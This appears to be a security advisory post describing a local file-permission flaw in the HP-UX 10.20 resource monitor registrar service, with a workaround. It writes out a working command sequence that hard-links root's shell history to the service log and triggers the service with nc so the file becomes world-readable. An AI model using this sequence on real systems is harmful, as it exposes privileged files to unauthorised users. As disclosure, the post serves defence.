HP-UX 10.20 resource monitor service

["J.A. Gutierrez" <spd () GTC1 CPS UNIZAR ES>]

    Problem: on HP-UX 10.20 you can change any file on the root
    partition to mode 644:

    $ uname -sr
    HP-UX B.10.20
    $ cd /etc/opt/resmon/log
    $ mv registrar.log registrar.log.orig
    $ ls -l /.sh_history
    -rw-------   1 root       sys           3316 Sep 20 15:22 /.sh_history
    $ ln /.sh_history registrar.log
    $ nc hpux.example.com 1712 < /etc/motd
    $ ls -l /.sh_history
    -rw-r--r--   2 root       sys           3605 Nov  8 09:45 /.sh_history
    $ rm -f registrar.log
    $ mv registrar.log.orig registrar.log

    So, /.sh_history becomes world readable, and text similar to

-------------------Start Event--------------------
Event 382 occurred at Wed Nov  8 09:45:28.818524 2000
Process ID: 10931 (/etc/opt/resmon/lbin/registrar)   Log Level: Error
_rm_recv: Couldn't malloc 1073803312 bytes for receive buffer
-------------------End Event----------------------

    gets appended to it.


    It seems it's fixed on HP-UX 11, so I guess there is already
    a patch for 10.20


    Workaround: chmod +t /etc/opt/resmon/log should work.


--
finger spd () gtc1 cps unizar es for PGP       /              So be easy and free
.mailcap tip of the day:                   /      when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null       /            (the pogues)